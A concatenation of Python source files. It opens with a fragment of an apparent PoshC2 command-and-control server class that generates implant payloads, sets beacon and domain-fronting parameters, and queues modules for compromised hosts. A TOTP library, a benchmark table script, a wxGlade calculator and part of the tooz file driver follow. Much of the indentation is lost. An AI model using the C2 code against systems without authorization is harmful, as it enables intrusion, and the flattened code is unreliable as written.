from poshc2.server.database.DB import get_defaultuseragent, new_implant, new_task, update_mods, get_autoruns, get_notificationstatus, get_url_by_id
class Implant(object):
def __init__(self, ipaddress, pivot, domain, user, hostname, arch, pid, procname, URLID):
self.RandomURI = randomuri()
        self.URLID = URLID,  # trailing comma: stored as a 1-tuple, read back via self.URLID[0]
self.Label = None
self.User = user
self.Hostname = hostname
self.IPAddress = ipaddress
self.Key = gen_key().decode("utf-8")
self.FirstSeen = (datetime.now(timezone.utc)).strftime("%Y-%m-%d %H:%M:%S")
self.LastSeen = (datetime.now(timezone.utc)).strftime("%Y-%m-%d %H:%M:%S")
self.PID = pid
self.ProcName = procname
self.Arch = arch
self.Domain = domain
self.DomainFrontHeader = get_dfheader()
self.Alive = "Yes"
self.UserAgent = get_defaultuseragent()
self.Sleep = get_defaultbeacon()
self.ModsLoaded = ""
self.Jitter = Jitter
self.ImplantID = ""
self.Pivot = pivot
self.KillDate = get_killdate()
self.ServerURL = select_item("PayloadCommsHost", "C2Server")
self.AllBeaconURLs = get_otherbeaconurls()
self.AllBeaconImages = get_images()
self.SharpCore = """
RANDOMURI19901%s10991IRUMODNAR
URLS10484390243%s34209348401SLRU
KILLDATE1665%s5661ETADLLIK
SLEEP98001%s10089PEELS
JITTER2025%s5202RETTIJ
NEWKEY8839394%s4939388YEKWEN
IMGS19459394%s49395491SGMI""" % (self.RandomURI, self.AllBeaconURLs, self.KillDate, self.Sleep, self.Jitter, self.Key, self.AllBeaconImages)
with open("%spy_dropper.sh" % (PayloadsDirectory), 'rb') as f:
self.PythonImplant = base64.b64encode(f.read()).decode("utf-8")
py_implant_core = open("%s/Implant-Core.py" % PayloadTemplatesDirectory, 'r').read()
self.PythonCore = py_implant_core % (self.DomainFrontHeader, self.Sleep, self.AllBeaconImages, self.AllBeaconURLs, self.KillDate, self.PythonImplant, self.Jitter, self.Key, self.RandomURI, self.UserAgent)
with open('/tmp/pythoncore.py', 'w') as output:
output.write(self.PythonCore)
ps_implant_core = open("%s/Implant-Core.ps1" % PayloadTemplatesDirectory, 'r').read()
        self.PSCore = ps_implant_core % (self.Key, self.Jitter, self.Sleep, self.AllBeaconImages, self.RandomURI, self.RandomURI, self.KillDate, self.AllBeaconURLs)
jxa_implant_core = open("%s/Implant-Core.js" % PayloadTemplatesDirectory, 'r').read()
self.JXACore = jxa_implant_core % (self.Key, self.Jitter, self.Sleep, self.AllBeaconImages, self.RandomURI, self.ServerURL, self.KillDate, self.AllBeaconURLs)
self.NativeCore = open("%s/stage2core.so" % PayloadTemplatesDirectory, 'rb').read().replace(b"RANDOMURI199011", self.RandomURI.encode('utf-8')).replace(b"RANDOMKEYDATAWENEEDTOFILLINLATERWITHSOMETHIN", self.Key.encode('utf-8'))
# Add all db elements
def display(self):
print(Colours.GREEN, "")
it = self.Pivot
if "pbind" in it.lower():
urlInfo = "PBind"
if "fcomm" in it.lower():
urlInfo = "FComm"
else:
urlInfo = get_url_by_id(self.URLID[0])
if urlInfo is not None:
urlInfo = f"URL: {urlInfo[1]}"
else:
urlInfo = "URL: Unknown"
print("[%s] New %s implant connected: (uri=%s key=%s)" % (self.ImplantID, it, self.RandomURI, self.Key))
print("%s | Time:%s | PID:%s | Process:%s | Sleep:%s | %s (%s) | %s" % (self.IPAddress, self.FirstSeen, str(self.PID), str(self.ProcName), str(self.Sleep), (str(self.User) + " @ " + str(self.Hostname)), self.Arch, urlInfo))
EnableNotifications = get_notificationstatus()
try:
Pushover_APIToken = select_item("Pushover_APIToken", "C2Server")
Pushover_APIUser = select_item("Pushover_APIUser", "C2Server")
if EnableNotifications.lower().strip() == "yes" and Pushover_APIToken:
conn = http.client.HTTPSConnection("api.pushover.net:443")
conn.request("POST", "/1/messages.json",
urllib.parse.urlencode({
"token": Pushover_APIToken,
"user": Pushover_APIUser,
"message": "[%s] - New Implant: %s @ %s" % (NotificationsProjectName, self.User, self.Hostname),
}), {"Content-type": "application/x-www-form-urlencoded"})
output = conn.getresponse()
if output.status != 200:
data = output.read()
print("\nPushover error: ")
print(data)
except Exception as e:
print("Pushover send error: %s" % e)
try:
Slack_BotToken = select_item("Slack_BotToken", "C2Server")
if EnableNotifications.lower().strip() == "yes" and Slack_BotToken:
mention_userid = select_item("Slack_UserID", "C2Server")
channel = select_item("Slack_Channel", "C2Server")
                Slack_BotToken = "Bearer " + Slack_BotToken
if mention_userid in ("", None):
mention_userid = ""
elif mention_userid.lower().strip() == "channel":
mention_userid = "<!channel> "
else:
mention_userid = "<@%s> " % str(mention_userid)
message = {"channel": channel, "text": "%s[%s] - New Implant: %s @ %s" % (mention_userid, NotificationsProjectName, self.User, self.Hostname), "as_user": "true", "link_names": "true"}
headers = {"Content-type": "application/json","Authorization": Slack_BotToken }
conn = http.client.HTTPSConnection("slack.com:443")
conn.request("POST", "/api/chat.postMessage",json.dumps(message), headers)
output = conn.getresponse()
if output.status != 200:
data = output.read()
print("Slack error: ")
print(data)
except Exception as e:
print("Slack send error: %s" % e)
def save(self):
self.ImplantID = new_implant(self.RandomURI, self.URLID[0], self.User, self.Hostname, self.IPAddress, self.Key, self.FirstSeen, self.FirstSeen, self.PID, self.ProcName, self.Arch, self.Domain, self.Alive, self.Sleep, self.ModsLoaded, self.Pivot, self.Label)
def autoruns(self):
if "C#" in self.Pivot:
new_task("loadmodule Stage2-Core.exe", "autoruns", self.RandomURI)
new_task("loadmodule PwrStatusTracker.dll", "autoruns", self.RandomURI)
new_task("loadpowerstatus", "autoruns", self.RandomURI)
update_mods("Stage2-Core.exe PwrStatusTracker.dll", self.RandomURI)
update_label("PSM", self.RandomURI)
if "PS" in self.Pivot:
new_task("loadmodule Stage2-Core.ps1", "autoruns", self.RandomURI)
update_mods("Stage2-Core.ps1", self.RandomURI)
if "PBind Pivot" in self.Pivot:
update_label("Parent: %s" % self.IPAddress, self.RandomURI)
#new_task("pbind-pivot-loadmodule Stage2-Core.exe", "autoruns", self.IPAddress)
update_mods("Stage2-Core.exe", self.RandomURI)
elif "PB" in self.Pivot:
update_label("Parent: %s" % self.IPAddress, self.RandomURI)
#new_task("pbind-loadmodule Stage2-Core.exe", "autoruns", self.IPAddress)
update_mods("Stage2-Core.exe", self.RandomURI)
if "FC" in self.Pivot:
update_label("Parent: %s" % self.IPAddress, self.RandomURI)
new_task("fcomm-loadmodule Stage2-Core.exe", "autoruns", self.RandomURI)
update_mods("Stage2-Core.exe", self.RandomURI)
result = get_autoruns()
if result:
for autorun in result:
run_autoloads(autorun[1], self.RandomURI, "autoruns")
new_task(autorun[1], "autoruns", self.RandomURI)
|
b195a56d55fd82ce128d21e28c54886add6f88c7
|
4f14b1901d909b0b917d35815e7b19233692f25b
|
/time-based-one-time-password-tools/totp.py
|
f61eb9c60cc39fbd3bc31d912a043488fb06e2fa
|
[] |
no_license
|
nayuki/Nayuki-web-published-code
|
e61a761e5c188aeacd35e5c8ddd005460545c94e
|
49414617b088ec4c4e339a6c1caa7ec0f40eb58f
|
refs/heads/master
| 2023-08-24T10:54:42.862243
| 2023-03-14T05:29:56
| 2023-03-14T05:29:56
| 25,706,873
| 133
| 53
| null | 2017-02-20T08:39:16
| 2014-10-24T20:33:24
|
Java
|
UTF-8
|
Python
| false
| false
| 4,860
|
py
|
totp.py
|
#
# Time-based One-Time Password tools (Python)
#
# Copyright (c) 2020 Project Nayuki. (MIT License)
# https://www.nayuki.io/page/time-based-one-time-password-tools
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
# the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
# - The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# - The Software is provided "as is", without warranty of any kind, express or
# implied, including but not limited to the warranties of merchantability,
# fitness for a particular purpose and noninfringement. In no event shall the
# authors or copyright holders be liable for any claim, damages or other
# liability, whether in an action of contract, tort or otherwise, arising from,
# out of or in connection with the Software or the use or other dealings in the
# Software.
#
import base64, hashlib, hmac, time, struct, sys, unittest
from typing import List, Optional, Tuple, Union
# ---- Library functions ----
# Time-based One-Time Password algorithm (RFC 6238)
def calc_totp(
secretkey: bytes,
epoch: int = 0,
timestep: int = 30,
timestamp: Optional[int] = None,
codelen: int = 6,
hashfunc = hashlib.sha1,
) -> str:
if timestamp is None:
timestamp = int(time.time())
# Check arguments
assert isinstance(epoch , int)
assert isinstance(timestep , int)
assert isinstance(timestamp, int)
# Calculate HOTP
timecounter: int = (timestamp - epoch) // timestep
return calc_hotp(secretkey, struct.pack(">Q", timecounter), codelen, hashfunc)
# HMAC-based One-Time Password algorithm (RFC 4226)
def calc_hotp(
secretkey: bytes,
counter: bytes,
codelen: int = 6,
hashfunc = hashlib.sha1,
) -> str:
# Check arguments
assert isinstance(secretkey, (bytes, bytearray))
assert isinstance(counter , (bytes, bytearray))
assert isinstance(codelen , int) and 1 <= codelen <= 9
# Calculate HMAC
hasher = hmac.new(secretkey, counter, hashfunc)
hash: bytes = hasher.digest()
# Dynamically truncate the hash value
offset: int = hash[-1] % 16
extracted: bytes = hash[offset : offset + 4]
val: int = struct.unpack(">I", extracted)[0]
val %= 2**31
# Extract and format base-10 digits
val %= 10**codelen
return str(val).zfill(codelen)
# Calculates TOTP for the most popular configuration:
# epoch=0, timestep=30, hashfunc=hashlib.sha1, codelen=6.
def calc_totp_compact_default(secretkey: bytes) -> str:
count = struct.pack(">Q", int(time.time()) // 30)
hash = hmac.new(secretkey, count, hashlib.sha1).digest()
offset = hash[-1] % 16
val, = struct.unpack(">I", hash[offset : offset + 4])
return str(val % 2**31 % 10**6).zfill(6)
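# A minimal usage sketch (the base32 secret below is an arbitrary example,
# not a real key): authenticator apps hand out keys in base32, so decode
# the key first, then compute the current 6-digit code.
def example_usage() -> None:
    secretkey: bytes = base64.b32decode("JBSWY3DPEHPK3PXP")
    print(calc_totp(secretkey))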
# ---- Test suite ----
class TotpTest(unittest.TestCase):
def test_hotp(self) -> None:
CASES: List[Tuple[int,str]] = [
(0, "284755224"),
(1, "094287082"),
(2, "137359152"),
(3, "726969429"),
(4, "640338314"),
(5, "868254676"),
(6, "918287922"),
(7, "082162583"),
(8, "673399871"),
(9, "645520489"),
]
SECRET_KEY: bytes = b"12345678901234567890"
for cs in CASES:
actual = calc_hotp(SECRET_KEY, struct.pack(">Q", cs[0]), 9, hashlib.sha1)
self.assertEqual(cs[1], actual)
def test_totp(self) -> None:
CASES: List[Tuple[int,str,str,str]] = [
( 59, "94287082", "46119246", "90693936"),
( 1111111109, "07081804", "68084774", "25091201"),
( 1111111111, "14050471", "67062674", "99943326"),
( 1234567890, "89005924", "91819424", "93441116"),
( 2000000000, "69279037", "90698825", "38618901"),
(20000000000, "65353130", "77737706", "47863826"),
]
SECRET_KEYS: List[bytes] = [
b"12345678901234567890",
b"12345678901234567890123456789012",
b"1234567890123456789012345678901234567890123456789012345678901234",
]
for cs in CASES:
self.assertEqual(cs[1], calc_totp(SECRET_KEYS[0], 0, 30, cs[0], 8, hashlib.sha1 ))
self.assertEqual(cs[2], calc_totp(SECRET_KEYS[1], 0, 30, cs[0], 8, hashlib.sha256))
self.assertEqual(cs[3], calc_totp(SECRET_KEYS[2], 0, 30, cs[0], 8, hashlib.sha512))
# ---- Main program ----
def main(args: List[str]) -> None:
if len(args) == 0:
unittest.main()
elif len(args) == 1:
keystr: str = args[0].replace(" ", "").upper()
secretkey: bytes = base64.b32decode(keystr)
code: str = calc_totp(secretkey)
assert calc_totp_compact_default(secretkey) == code
print(code)
else:
sys.exit("Usage: python totp.py [SecretKey]")
if __name__ == "__main__":
main(sys.argv[1 : ])
|
539fc15d08bab0e86007c157c564de41b7e29f7b
|
77861deda8b3046bdda221d3cb80b77e84b14523
|
/iterater-over-bits/scripts/print_table.py
|
6c6d91053c5cbd878dd8ab6911c06b938ad97b1d
|
[
"BSD-2-Clause"
] |
permissive
|
WojciechMula/toys
|
b73f09212ca19f1e76bbf2afaa5ad2efcea95175
|
6110b59de45dc1ce44388b21c6437eff49a7655c
|
refs/heads/master
| 2023-08-18T12:54:25.919406
| 2023-08-05T09:20:14
| 2023-08-05T09:20:14
| 14,905,115
| 302
| 44
|
BSD-2-Clause
| 2020-04-17T17:10:42
| 2013-12-03T20:35:37
|
C++
|
UTF-8
|
Python
| false
| false
| 1,855
|
py
|
print_table.py
|
from table import Table
def print_report(path):
table1 = Table()
table2 = Table()
header_common = [
"case",
"size [bits]",
"cardinality [bits]",
"fill factor",
]
table1.set_header(header_common + [
"naive [us]",
"better [us]",
"block-3 [us]",
"block-4 [us]",
])
table2.set_header(header_common + [
"naive [x]",
"better [x]",
"block-3 [x]",
"block-4 [x]",
])
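    # Each input line is expected to carry 7 comma-separated fields,
    # in this order (the values below are a hypothetical example row):
    #   name,size,cardinality,naive,better,block3,block4
    #   dense,1048576,524288,1200,800,400,350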
with open(path, 'rt') as f:
prev_name = None
for line in f:
F = line.split(',')
assert(len(F) == 7)
if F[0] == prev_name:
name = ""
else:
name = F[0]
            prev_name = F[0]
size = int(F[1])
cardinality = int(F[2])
fill_factor = float(cardinality)/size
naive_time = int(F[3])
better_time = int(F[4])
block3_time = int(F[5])
block4_time = int(F[6])
row_common = [
name,
'%d' % size,
'%d' % cardinality,
'%0.2f' % fill_factor,
]
table1.add_row(row_common + [
format(naive_time, ",d"),
format(better_time, ",d"),
format(block3_time, ",d"),
format(block4_time, ",d"),
])
table2.add_row(row_common + [
"%0.2f" % (float(naive_time)/naive_time),
"%0.2f" % (float(naive_time)/better_time),
"%0.2f" % (float(naive_time)/block3_time),
"%0.2f" % (float(naive_time)/block4_time),
])
    print(table1)
    print()
    print(table2)
if __name__ == '__main__':
import sys
print_report(sys.argv[1])
|
c3f1b08b2731cc1e55cf904527c85b973c6f2ec4
|
d7697a668e560e0447bc2844baa48d747cf1e70b
|
/examples/Calculator/Calculator.py
|
c66ee732b2cdea6ec2cc3d2640a6fd49e01e11e9
|
[
"MIT",
"LicenseRef-scancode-warranty-disclaimer",
"LicenseRef-scancode-unknown-license-reference",
"WxWindows-exception-3.1",
"LGPL-2.0-or-later"
] |
permissive
|
wxGlade/wxGlade
|
4bdfb98ea305163fa2187c0a59dd8e8612974163
|
828515e217c4733d38c57ed88d853e983a2008f2
|
refs/heads/master
| 2023-09-01T15:49:41.152236
| 2023-08-26T16:34:36
| 2023-08-26T16:34:36
| 126,486,431
| 275
| 59
|
MIT
| 2023-05-02T18:27:53
| 2018-03-23T13:06:05
|
Python
|
UTF-8
|
Python
| false
| false
| 4,045
|
py
|
Calculator.py
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
#
# generated by wxGlade 0.8.0a6 on Thu Nov 02 22:44:22 2017
#
import wx
# begin wxGlade: dependencies
# end wxGlade
# begin wxGlade: extracode
# end wxGlade
class CalculatorFrame(wx.Frame):
def __init__(self, *args, **kwds):
# begin wxGlade: CalculatorFrame.__init__
kwds["style"] = kwds.get("style", 0) | wx.DEFAULT_FRAME_STYLE
wx.Frame.__init__(self, *args, **kwds)
self.SetSize((400, 300))
self.SetTitle("Calculator")
self.panel_1 = wx.Panel(self, wx.ID_ANY)
sizer_1 = wx.BoxSizer(wx.VERTICAL)
sizer_2 = wx.BoxSizer(wx.HORIZONTAL)
sizer_1.Add(sizer_2, 0, wx.ALL | wx.EXPAND, 4)
label_1 = wx.StaticText(self.panel_1, wx.ID_ANY, "Value 1:")
sizer_2.Add(label_1, 0, wx.ALIGN_CENTER_VERTICAL, 0)
self.text_value1 = wx.TextCtrl(self.panel_1, wx.ID_ANY, "")
sizer_2.Add(self.text_value1, 1, 0, 0)
sizer_3 = wx.BoxSizer(wx.HORIZONTAL)
sizer_1.Add(sizer_3, 0, wx.ALL | wx.EXPAND, 4)
label_4 = wx.StaticText(self.panel_1, wx.ID_ANY, "Operator:")
sizer_3.Add(label_4, 0, wx.ALIGN_CENTER_VERTICAL, 0)
self.radiobox_operator = wx.RadioBox(self.panel_1, wx.ID_ANY, "", choices=["+", "-", "*", "/"], majorDimension=1, style=wx.RA_SPECIFY_ROWS)
self.radiobox_operator.SetSelection(0)
sizer_3.Add(self.radiobox_operator, 0, 0, 0)
sizer_4 = wx.BoxSizer(wx.HORIZONTAL)
sizer_1.Add(sizer_4, 0, wx.ALL | wx.EXPAND, 4)
label_2 = wx.StaticText(self.panel_1, wx.ID_ANY, "Value 2:")
sizer_4.Add(label_2, 0, wx.ALIGN_CENTER_VERTICAL, 0)
self.text_value2 = wx.TextCtrl(self.panel_1, wx.ID_ANY, "")
sizer_4.Add(self.text_value2, 1, 0, 0)
static_line_1 = wx.StaticLine(self.panel_1, wx.ID_ANY)
sizer_1.Add(static_line_1, 0, wx.BOTTOM | wx.EXPAND | wx.TOP, 5)
sizer_5 = wx.BoxSizer(wx.HORIZONTAL)
sizer_1.Add(sizer_5, 1, wx.ALL | wx.EXPAND, 4)
label_3 = wx.StaticText(self.panel_1, wx.ID_ANY, "Result:")
sizer_5.Add(label_3, 0, 0, 0)
self.text_result = wx.TextCtrl(self.panel_1, wx.ID_ANY, "", style=wx.TE_MULTILINE | wx.TE_READONLY)
self.text_result.SetBackgroundColour(wx.Colour(212, 208, 200))
sizer_5.Add(self.text_result, 1, wx.EXPAND, 0)
sizer_6 = wx.BoxSizer(wx.HORIZONTAL)
sizer_1.Add(sizer_6, 0, wx.ALIGN_CENTER_HORIZONTAL, 0)
self.button_execute = wx.Button(self.panel_1, wx.ID_ANY, "Execute")
self.button_execute.SetDefault()
sizer_6.Add(self.button_execute, 0, wx.ALL, 5)
self.button_reset = wx.Button(self.panel_1, wx.ID_ANY, "Reset")
sizer_6.Add(self.button_reset, 0, wx.ALL, 5)
self.panel_1.SetSizer(sizer_1)
self.Layout()
self.Bind(wx.EVT_BUTTON, self.on_execute_button_clicked, self.button_execute)
self.Bind(wx.EVT_BUTTON, self.on_reset_button_clicked, self.button_reset)
# end wxGlade
def on_execute_button_clicked(self, event): # wxGlade: CalculatorFrame.<event_handler>
value1 = float( self.text_value1.GetValue() )
value2 = float( self.text_value2.GetValue() )
operator = self.radiobox_operator.GetSelection() # a number from 0 to 3
if operator==0: result = value1 + value2
elif operator==1: result = value1 - value2
elif operator==2: result = value1 * value2
elif operator==3: result = value1 / value2
self.text_result.AppendText("%s\n"%result)
event.Skip()
def on_reset_button_clicked(self, event): # wxGlade: CalculatorFrame.<event_handler>
self.text_result.Clear()
event.Skip()
# end of class CalculatorFrame
class MyApp(wx.App):
def OnInit(self):
self.frame = CalculatorFrame(None, wx.ID_ANY, "")
self.SetTopWindow(self.frame)
self.frame.Show()
return True
# end of class MyApp
if __name__ == "__main__":
app = MyApp(0)
app.MainLoop()
|
d5d55431cdf55dd6af490769a3faa966ad4c622d
|
32c61e92b792c3572287033ef5051fd67ef9c912
|
/tooz/drivers/file.py
|
eb26eb0d69534378e61746521b7f51623b6eddc8
|
[
"Apache-2.0"
] |
permissive
|
openstack/tooz
|
8095697e973635f49e104a0bbc8e34e2231a3b91
|
702ea408b2d5c2b2ee27d56d4eeef1ce0263a1b9
|
refs/heads/master
| 2023-09-02T07:29:42.602556
| 2023-08-11T11:10:40
| 2023-08-11T11:10:40
| 14,909,684
| 115
| 64
|
Apache-2.0
| 2018-03-05T21:15:45
| 2013-12-04T00:18:39
|
Python
|
UTF-8
|
Python
| false
| false
| 20,558
|
py
|
file.py
|
# -*- coding: utf-8 -*-
#
# Copyright © 2015 eNovance
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import contextlib
import datetime
import errno
import functools
import hashlib
import logging
import os
import re
import shutil
import sys
import tempfile
import threading
import weakref
import fasteners
from oslo_utils import encodeutils
from oslo_utils import fileutils
from oslo_utils import timeutils
import voluptuous
import tooz
from tooz import coordination
from tooz import locking
from tooz import utils
LOG = logging.getLogger(__name__)
class _Barrier(object):
def __init__(self):
self.cond = threading.Condition()
self.owner = None
self.shared = False
self.ref = 0
@contextlib.contextmanager
def _translate_failures():
try:
yield
except (EnvironmentError, voluptuous.Invalid) as e:
utils.raise_with_cause(tooz.ToozError,
encodeutils.exception_to_unicode(e),
cause=e)
def _convert_from_old_format(data):
    # NOTE(sileht): previous versions of the driver stored str as-is,
    # making it impossible to read from python3 something written with the
    # python2 version of the lib.
    # Now everything is stored with an explicit type (bytes or unicode).
    # This converts the old format to the new one to maintain compatibility
    # with already deployed files.
# example of potential old python2 payload:
# {b"member_id": b"member"}
# {b"member_id": u"member"}
# example of potential old python3 payload:
# {u"member_id": b"member"}
# {u"member_id": u"member"}
if b"member_id" in data or b"group_id" in data:
data = dict((k.decode("utf8"), v) for k, v in data.items())
        # As for the member_id and group_id values: if the file was written
        # with python2 in the old format, python3 cannot tell whether the
        # value needs decoding or not, since python3 only sees a bytes blob.
        # We keep it as-is and hope for the best; this has a good chance of
        # breaking if the application used str in python2 and unicode in
        # python3. The member file is overwritten often, so it should be
        # fine, but the group file can be very old, so we now have to
        # update it each time create_group is called.
return data
def _lock_me(lock):
def wrapper(func):
@functools.wraps(func)
def decorator(*args, **kwargs):
with lock:
return func(*args, **kwargs)
return decorator
return wrapper
class FileLock(locking.Lock):
"""A file based lock."""
def __init__(self, path, barrier, member_id):
super(FileLock, self).__init__(path)
self.acquired = False
self._lock = fasteners.InterProcessLock(path)
self._barrier = barrier
self._member_id = member_id
self.ref = 0
def is_still_owner(self):
return self.acquired
def acquire(self, blocking=True, shared=False):
blocking, timeout = utils.convert_blocking(blocking)
watch = timeutils.StopWatch(duration=timeout)
watch.start()
# Make the shared barrier ours first.
with self._barrier.cond:
while self._barrier.owner is not None:
if (shared and self._barrier.shared):
break
if not blocking or watch.expired():
return False
self._barrier.cond.wait(watch.leftover(return_none=True))
self._barrier.owner = (threading.current_thread().ident,
os.getpid(), self._member_id)
self._barrier.shared = shared
self._barrier.ref += 1
self.ref += 1
# Ok at this point we are now working in a thread safe manner,
# and now we can try to get the actual lock...
gotten = False
try:
gotten = self._lock.acquire(
blocking=blocking,
# Since the barrier waiting may have
# taken a long time, we have to use
# the leftover (and not the original).
timeout=watch.leftover(return_none=True))
finally:
# NOTE(harlowja): do this in a finally block to **ensure** that
# we release the barrier if something bad happens...
if not gotten:
# Release the barrier to let someone else have a go at it...
with self._barrier.cond:
self._barrier.owner = None
self._barrier.ref = 0
self._barrier.shared = False
self._barrier.cond.notify_all()
self.acquired = gotten
return gotten
def release(self):
if not self.acquired:
return False
with self._barrier.cond:
self._barrier.ref -= 1
self.ref -= 1
if not self.ref:
self.acquired = False
if not self._barrier.ref:
self._barrier.owner = None
self._lock.release()
self._barrier.cond.notify_all()
return True
def __del__(self):
if self.acquired:
LOG.warning("Unreleased lock %s garbage collected", self.name)
class FileDriver(coordination.CoordinationDriverCachedRunWatchers,
coordination.CoordinationDriverWithExecutor):
"""A file based driver.
This driver uses files and directories (and associated file locks) to
provide the coordination driver semantics and required API(s). It **is**
missing some functionality but in the future these not implemented API(s)
will be filled in.
The File driver connection URI should look like::
file://DIRECTORY[?timeout=TIMEOUT]
DIRECTORY is the location that should be used to store lock files.
TIMEOUT defaults to 10.
General recommendations/usage considerations:
- It does **not** automatically delete members from
groups of processes that have died, manual cleanup will be needed
for those types of failures.
- It is **not** distributed (or recommended to be used in those
situations, so the developer using this should really take that into
      account when applying this driver in their app).
"""
CHARACTERISTICS = (
coordination.Characteristics.NON_TIMEOUT_BASED,
coordination.Characteristics.DISTRIBUTED_ACROSS_THREADS,
coordination.Characteristics.DISTRIBUTED_ACROSS_PROCESSES,
)
"""
Tuple of :py:class:`~tooz.coordination.Characteristics` introspectable
    enum member(s) that can be used to interrogate how this driver works.
"""
HASH_ROUTINE = 'sha1'
"""This routine is used to hash a member (or group) id into a filesystem
safe name that can be used for member lookup and group joining."""
_barriers = weakref.WeakValueDictionary()
"""
    Barriers shared among all file driver locks; this is required
    since interprocess locking is not thread aware, so we must add the
    thread awareness on top of it instead.
"""
def __init__(self, member_id, parsed_url, options):
"""Initialize the file driver."""
super(FileDriver, self).__init__(member_id, parsed_url, options)
self._dir = self._normalize_path(parsed_url.path)
self._group_dir = os.path.join(self._dir, 'groups')
self._tmpdir = os.path.join(self._dir, 'tmp')
self._driver_lock_path = os.path.join(self._dir, '.driver_lock')
self._driver_lock = self._get_raw_lock(self._driver_lock_path,
self._member_id)
self._reserved_dirs = [self._dir, self._group_dir, self._tmpdir]
self._reserved_paths = list(self._reserved_dirs)
self._reserved_paths.append(self._driver_lock_path)
self._safe_member_id = self._make_filesystem_safe(member_id)
self._timeout = int(self._options.get('timeout', 10))
@staticmethod
def _normalize_path(path):
if sys.platform == 'win32':
# Replace slashes with backslashes and make sure we don't
# have any at the beginning of paths that include drive letters.
#
# Expected url format:
# file:////share_address/share_name
# file:///C:/path
return re.sub(r'\\(?=\w:\\)', '',
os.path.normpath(path))
return path
@classmethod
def _get_raw_lock(cls, path, member_id):
lock_barrier = cls._barriers.setdefault(path, _Barrier())
return FileLock(path, lock_barrier, member_id)
def get_lock(self, name):
path = utils.safe_abs_path(self._dir, name.decode())
if path in self._reserved_paths:
raise ValueError("Unable to create a lock using"
" reserved path '%s' for lock"
" with name '%s'" % (path, name))
return self._get_raw_lock(path, self._member_id)
@classmethod
def _make_filesystem_safe(cls, item):
item = utils.to_binary(item, encoding="utf8")
return hashlib.new(cls.HASH_ROUTINE, item).hexdigest()
def _start(self):
super(FileDriver, self)._start()
for a_dir in self._reserved_dirs:
try:
fileutils.ensure_tree(a_dir)
except OSError as e:
raise coordination.ToozConnectionError(e)
def _update_group_metadata(self, path, group_id):
details = {
u'group_id': utils.to_binary(group_id, encoding="utf8")
}
details[u'encoded'] = details[u"group_id"] != group_id
details_blob = utils.dumps(details)
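        # Write to a temporary file and rename it into place so that, on
        # POSIX filesystems, the metadata file is replaced atomically and
        # readers never observe a partially written blob.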
fd, name = tempfile.mkstemp("tooz", dir=self._tmpdir)
with os.fdopen(fd, "wb") as fh:
fh.write(details_blob)
os.rename(name, path)
def create_group(self, group_id):
safe_group_id = self._make_filesystem_safe(group_id)
group_dir = os.path.join(self._group_dir, safe_group_id)
group_meta_path = os.path.join(group_dir, '.metadata')
def _do_create_group():
if os.path.exists(os.path.join(group_dir, ".metadata")):
                # NOTE(sileht): We update the group metadata even if it is
                # already good, to ensure dict keys are converted to unicode
                # in case the file was written with tooz < 1.36
self._update_group_metadata(group_meta_path, group_id)
raise coordination.GroupAlreadyExist(group_id)
else:
fileutils.ensure_tree(group_dir)
self._update_group_metadata(group_meta_path, group_id)
fut = self._executor.submit(_do_create_group)
return FileFutureResult(fut)
def join_group(self, group_id, capabilities=b""):
safe_group_id = self._make_filesystem_safe(group_id)
group_dir = os.path.join(self._group_dir, safe_group_id)
me_path = os.path.join(group_dir, "%s.raw" % self._safe_member_id)
@_lock_me(self._driver_lock)
def _do_join_group():
if not os.path.exists(os.path.join(group_dir, ".metadata")):
raise coordination.GroupNotCreated(group_id)
if os.path.isfile(me_path):
raise coordination.MemberAlreadyExist(group_id,
self._member_id)
details = {
u'capabilities': capabilities,
u'joined_on': datetime.datetime.now(),
u'member_id': utils.to_binary(self._member_id,
encoding="utf-8")
}
details[u'encoded'] = details[u"member_id"] != self._member_id
details_blob = utils.dumps(details)
with open(me_path, "wb") as fh:
fh.write(details_blob)
self._joined_groups.add(group_id)
fut = self._executor.submit(_do_join_group)
return FileFutureResult(fut)
def leave_group(self, group_id):
safe_group_id = self._make_filesystem_safe(group_id)
group_dir = os.path.join(self._group_dir, safe_group_id)
me_path = os.path.join(group_dir, "%s.raw" % self._safe_member_id)
@_lock_me(self._driver_lock)
def _do_leave_group():
if not os.path.exists(os.path.join(group_dir, ".metadata")):
raise coordination.GroupNotCreated(group_id)
try:
os.unlink(me_path)
except EnvironmentError as e:
if e.errno != errno.ENOENT:
raise
else:
raise coordination.MemberNotJoined(group_id,
self._member_id)
else:
self._joined_groups.discard(group_id)
fut = self._executor.submit(_do_leave_group)
return FileFutureResult(fut)
_SCHEMAS = {
'group': voluptuous.Schema({
voluptuous.Required('group_id'): voluptuous.Any(str, bytes),
# NOTE(sileht): tooz <1.36 was creating file without this
voluptuous.Optional('encoded'): bool,
}),
'member': voluptuous.Schema({
voluptuous.Required('member_id'): voluptuous.Any(str, bytes),
voluptuous.Required('joined_on'): datetime.datetime,
# NOTE(sileht): tooz <1.36 was creating file without this
voluptuous.Optional('encoded'): bool,
}, extra=voluptuous.ALLOW_EXTRA),
}
def _load_and_validate(self, blob, schema_key):
data = utils.loads(blob)
data = _convert_from_old_format(data)
schema = self._SCHEMAS[schema_key]
return schema(data)
def _read_member_id(self, path):
with open(path, 'rb') as fh:
details = self._load_and_validate(fh.read(), 'member')
if details.get("encoded"):
return details[u'member_id'].decode("utf-8")
return details[u'member_id']
def get_members(self, group_id):
safe_group_id = self._make_filesystem_safe(group_id)
group_dir = os.path.join(self._group_dir, safe_group_id)
@_lock_me(self._driver_lock)
def _do_get_members():
if not os.path.isdir(group_dir):
raise coordination.GroupNotCreated(group_id)
members = set()
try:
entries = os.listdir(group_dir)
except EnvironmentError as e:
# Did someone manage to remove it before we got here...
if e.errno != errno.ENOENT:
raise
else:
for entry in entries:
if not entry.endswith('.raw'):
continue
entry_path = os.path.join(group_dir, entry)
try:
m_time = datetime.datetime.fromtimestamp(
os.stat(entry_path).st_mtime)
